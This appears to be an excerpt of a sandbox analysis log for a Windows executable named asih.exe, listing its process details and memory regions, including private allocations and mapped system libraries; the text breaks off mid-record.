# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 29.03.2024 05:49:55.786 Process: id = "1" image_name = "asih.exe" filename = "c:\\users\\oqxzraykm\\desktop\\asih.exe" page_root = "0x3f6ee000" os_pid = "0x17b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0xa04" cmd_line = "\"C:\\Users\\OqXZRaykm\\Desktop\\asih.exe\" " cur_dir = "C:\\Users\\OqXZRaykm\\Desktop\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001d295" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 151 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 152 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 153 start_va = 0x40000 end_va = 0x5cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 154 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 155 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 156 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 157 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 158 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 159 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 160 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x501000 region_type = mapped_file name = "asih.exe" filename = "\\Users\\OqXZRaykm\\Desktop\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\asih.exe") Region: id = 161 start_va = 0x77ca0000 end_va = 0x77e41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 162 start_va = 0x7ffa0000 end_va = 0x7ffa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffa0000" filename = "" Region: id = 163 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 164 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 165 start_va = 0x7fff0000 end_va = 0xffffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 166 start_va = 0x7ffc28e70000 end_va = 0x7ffc29063fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 319 start_va = 0x7ff90000 end_va = 0x7ff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 320 start_va = 0x7ff70000 end_va = 0x7ff80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff70000" filename = "" Region: id = 321 start_va = 0x1d0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 322 start_va = 0x7ffc28400000 end_va = 0x7ffc28458fff monitored = 0 entry_point = 0x7ffc28418ff0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 323 start_va = 0x7ffc28580000 end_va = 0x7ffc28602fff monitored = 0 entry_point = 0x7ffc2858fb00 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 324 start_va = 0x77c90000 end_va = 0x77c99fff monitored = 0 entry_point = 0x77c912e0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 325 start_va = 0x7ff60000 end_va = 0x7ff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 326 start_va = 0x7ff50000 end_va = 0x7ff58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 327 start_va = 0x510000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 328 start_va = 0x76fe0000 end_va = 0x770cffff monitored = 0 entry_point = 0x76fff5a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 329 start_va = 0x77980000 end_va = 0x77b92fff monitored = 0 entry_point = 0x77a94030 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 330 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 331 start_va = 0x7fe50000 end_va = 0x7ff4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fe50000" filename = "" Region: id = 332 start_va = 0x400000 end_va = 0x4c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 333 start_va = 0x75ae0000 end_va = 0x75b7efff monitored = 0 entry_point = 0x75b185c0 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 334 start_va = 0x7fa70000 end_va = 0x7fe4cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 335 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 336 start_va = 0x75d90000 end_va = 0x75db2fff monitored = 0 entry_point = 0x75d973c0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 337 start_va = 0x76ad0000 end_va = 0x76ae7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\SysWOW64\\win32u.dll" (normalized: "c:\\windows\\syswow64\\win32u.dll") Region: id = 338 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 339 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 340 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 341 start_va = 0x75b80000 end_va = 0x75c5afff monitored = 0 entry_point = 0x75bdfc10 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\SysWOW64\\gdi32full.dll" (normalized: "c:\\windows\\syswow64\\gdi32full.dll") Region: id = 342 start_va = 0x77130000 end_va = 0x771aafff monitored = 0 entry_point = 0x77147800 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\SysWOW64\\msvcp_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp_win.dll") Region: id = 343 start_va = 0x75c70000 end_va = 0x75d8ffff monitored = 0 entry_point = 0x75c9b170 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 344 start_va = 0x75dc0000 end_va = 0x75f53fff monitored = 0 entry_point = 0x75df9860 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 345 start_va = 0x30000 end_va = 0x37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 346 start_va = 0x4d0000 end_va = 0x4f2fff monitored = 0 entry_point = 0x4d4410 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 347 start_va = 0x7c0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 348 start_va = 0x764d0000 end_va = 0x764f4fff monitored = 0 entry_point = 0x764d4410 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 349 start_va = 0x9c0000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 350 start_va = 0xb50000 end_va = 0x1f50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 351 start_va = 0x74a20000 end_va = 0x74a93fff monitored = 0 entry_point = 0x74a57550 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 352 start_va = 0x76af0000 end_va = 0x76baefff monitored = 0 entry_point = 0x76b25ac0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 353 start_va = 0x76600000 end_va = 0x7687ffff monitored = 0 entry_point = 0x7673a960 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 354 start_va = 0x76410000 end_va = 0x764c9fff monitored = 0 entry_point = 0x7644a2c0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 355 start_va = 0x1f60000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 356 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 357 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 358 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 359 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 360 start_va = 0x2050000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 361 start_va = 0x76e10000 end_va = 0x76ee1fff monitored = 0 entry_point = 0x76e5d9d0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 362 start_va = 0x76ef0000 end_va = 0x76f8afff monitored = 0 entry_point = 0x76f25a20 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 363 start_va = 0x76bb0000 end_va = 0x76c24fff monitored = 0 entry_point = 0x76bcf710 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 364 start_va = 0x2050000 end_va = 0x2131fff monitored = 0 entry_point = 0x207c600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 365 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 366 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 367 start_va = 0x2050000 end_va = 0x2131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 368 start_va = 0x4e0000 end_va = 0x4e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 369 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 370 start_va = 0x1f60000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 371 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 372 start_va = 0x550000 end_va = 0x555fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 373 start_va = 0x560000 end_va = 0x565fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 374 start_va = 0x4e0000 end_va = 0x4e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 375 start_va = 0x570000 end_va = 0x574fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 376 start_va = 0x580000 end_va = 0x585fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 377 start_va = 0x72ae0000 end_va = 0x72f37fff monitored = 0 entry_point = 0x72e022f0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 378 start_va = 0x77230000 end_va = 0x777d6fff monitored = 0 entry_point = 0x773a9e50 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 379 start_va = 0x2050000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 380 start_va = 0x2160000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 381 start_va = 0x2260000 end_va = 0x2597fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 382 start_va = 0x77840000 end_va = 0x778c6fff monitored = 0 entry_point = 0x77882d70 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 383 start_va = 0x770d0000 end_va = 0x7712bfff monitored = 0 entry_point = 0x77100900 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 384 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 385 start_va = 0x76d40000 end_va = 0x76d84fff monitored = 0 entry_point = 0x76d57870 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 386 start_va = 0x72f70000 end_va = 0x73572fff monitored = 0 entry_point = 0x7314ae30 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 387 start_va = 0x72f40000 end_va = 0x72f62fff monitored = 0 entry_point = 0x72f48580 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\SysWOW64\\wldp.dll" (normalized: "c:\\windows\\syswow64\\wldp.dll") Region: id = 388 start_va = 0x76d90000 end_va = 0x76e08fff monitored = 0 entry_point = 0x76da1a00 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 389 start_va = 0x75850000 end_va = 0x7585efff monitored = 0 entry_point = 0x75854830 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 390 start_va = 0x77ba0000 end_va = 0x77c82fff monitored = 0 entry_point = 0x77bcc600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 391 start_va = 0x71c20000 end_va = 0x71ce1fff monitored = 0 entry_point = 0x71c809b0 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 392 start_va = 0x590000 end_va = 0x596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 393 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 394 start_va = 0x76880000 end_va = 0x768fdfff monitored = 0 entry_point = 0x768ebd50 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 395 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 396 start_va = 0x1fe0000 end_va = 0x1fe3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 397 start_va = 0x1ff0000 end_va = 0x2038fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000001.db") Region: id = 398 start_va = 0x2050000 end_va = 0x2053fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 399 start_va = 0x2120000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 400 start_va = 0x2060000 end_va = 0x20fbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 401 start_va = 0x2100000 end_va = 0x210ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 402 start_va = 0x2110000 end_va = 0x2113fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 403 start_va = 0x2130000 end_va = 0x2143fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 404 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 405 start_va = 0x72ac0000 end_va = 0x72ad7fff monitored = 0 entry_point = 0x72aca250 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 406 start_va = 0x25b0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 407 start_va = 0x25f0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 408 start_va = 0x75f60000 end_va = 0x75f9afff monitored = 0 entry_point = 0x75f6d450 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 409 start_va = 0x74d20000 end_va = 0x74d3afff monitored = 0 entry_point = 0x74d247c0 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 410 start_va = 0x26f0000 end_va = 0x272ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 411 start_va = 0x2730000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 412 start_va = 0x2830000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 413 start_va = 0x2870000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 414 start_va = 0x2970000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 415 start_va = 0x29b0000 end_va = 0x2aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 416 start_va = 0x2ab0000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 417 start_va = 0x2af0000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 418 start_va = 0x2bf0000 end_va = 0x2c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 419 start_va = 0x2c30000 end_va = 0x2d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 420 start_va = 0x2110000 end_va = 0x2111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 421 start_va = 0x2d30000 end_va = 0x2d30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 422 start_va = 0x2d40000 end_va = 0x2d40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d40000" filename = "" Region: id = 423 start_va = 0x71ff0000 end_va = 0x72082fff monitored = 0 entry_point = 0x7206cac0 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\SysWOW64\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\syswow64\\windows.staterepositoryps.dll") Region: id = 503 start_va = 0x73580000 end_va = 0x73727fff monitored = 0 entry_point = 0x73601b70 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 504 start_va = 0x758b0000 end_va = 0x75ad9fff monitored = 0 entry_point = 0x75a694e0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 505 start_va = 0x737a0000 end_va = 0x737c0fff monitored = 0 entry_point = 0x737aca40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 506 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 508 start_va = 0x71f10000 end_va = 0x71fecfff monitored = 0 entry_point = 0x71f87530 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 509 start_va = 0x71ea0000 end_va = 0x71f0ffff monitored = 0 entry_point = 0x71ef7c50 region_type = mapped_file name = "appresolver.dll" filename = "\\Windows\\SysWOW64\\AppResolver.dll" (normalized: "c:\\windows\\syswow64\\appresolver.dll") Region: id = 510 start_va = 0x71e50000 end_va = 0x71e97fff monitored = 0 entry_point = 0x71e6ea70 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 511 start_va = 0x71e30000 end_va = 0x71e4efff monitored = 0 entry_point = 0x71e32200 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 512 start_va = 0x751c0000 end_va = 0x751e4fff monitored = 0 entry_point = 0x751c8820 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 513 start_va = 0x71e10000 end_va = 0x71e2bfff monitored = 0 entry_point = 0x71e17970 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 514 start_va = 0x2d50000 end_va = 0x2d53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 515 start_va = 0x2d60000 end_va = 0x2d71fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001d.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001d.db") Region: id = 516 start_va = 0x2d80000 end_va = 0x2d83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 517 start_va = 0x2d50000 end_va = 0x2d50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d50000" filename = "" Region: id = 518 start_va = 0x71dd0000 end_va = 0x71e0cfff monitored = 0 entry_point = 0x71e00280 region_type = mapped_file name = 